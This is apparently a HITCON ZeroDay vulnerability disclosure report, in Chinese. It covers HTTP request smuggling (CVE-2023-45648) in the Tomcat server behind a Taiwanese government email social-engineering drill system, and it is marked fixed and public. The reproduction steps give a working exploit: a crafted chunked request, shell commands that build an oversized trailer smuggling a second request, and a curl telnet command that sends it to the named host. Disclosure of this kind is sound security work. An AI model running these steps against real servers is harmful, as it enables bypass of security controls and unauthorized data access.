Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2024-00978
- Vendor: 資安院
- Title: 資安院電子郵件社交工程演練系統
- Introduction: HTTP請求走私
處理狀態
目前狀態
公開
Last Update : 2024/10/10
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2024/08/19 00:22:05 : 新提交 (由 ChaosFractal 更新此狀態)
- 2024/08/19 00:24:27 : 新提交 (由 ChaosFractal 更新此狀態)
- 2024/08/27 23:18:05 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/09/06 16:31:34 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/09/06 16:31:34 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/09/06 16:31:34 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/10/04 10:41:27 : 複測申請中 (由 組織帳號 更新此狀態)
- 2024/10/06 08:40:56 : 確認已修補 (由 ChaosFractal 更新此狀態)
- 2024/10/10 03:00:07 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2024-00978
- 通報者:ChaosFractal (ChaosFractal)
- 風險:高
- 類型:其他 (Other)
參考資料
暫無資料
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://solo.twilightparadox.com
敘述
1) 查看網頁根頁面發現是 資安院電子郵件社交工程演練系統
2) 透過錯誤訊息取得伺服器版本 Apache Tomcat/9.0.80
curl -iLkg "http://solo.twilightparadox.com/acbIed7527d6da2b0496a58295b178b2851e67f3/the_lamp%252C_linux%252Fapache%252Fmysql%252Fphp_solution.html"
3) 測試CVE-2023-45648 HTTP請求走私漏洞
3.1) 將以下內容另存成base.txt
POST /examples/test.jsp HTTP/1.1
Host: www.example.co.jp
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Connection: KeepAlive
5
foo=b
2
ar
0
testaimoto: AAAAA
3.2) 執行以下語法,建立特定請求
$ echo -n "testtrailer: " > 8190_EXCLUDE_COLON_SP_CR_LF.txt
$ for i in `seq 8179`; do echo -n "a"; done >> 8190_EXCLUDE_COLON_SP_CR_LF.txt
$ perl -e 'print "\r\n"' >> 8190_EXCLUDE_COLON_SP_CR_LF.txt
$ head -11 base.txt > attack5.txt
$ cat 8190_EXCLUDE_COLON_SP_CR_LF.txt >> attack5.txt
$ perl -e 'print "a: GET /examples/?this_is_attack HTTP/1.1\r\nHost: attack\r\n\r\n"' >> attack5.txt
4) 透過telent發送,測試成功
$ cat attack5.txt | curl telnet://solo.twilightparadox.com:80/ --output -
5) 由於Tomcat未能正確解析HTTP Trailer標頭,超出標頭大小限制的特製Trailer標頭可能會導致Tomcat將單個請求視為多個請求,從而可能導致在反向代理之後出現請求走私。成功利用漏洞可能導致繞過安全控制,未經授權存取敏感資料等。
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。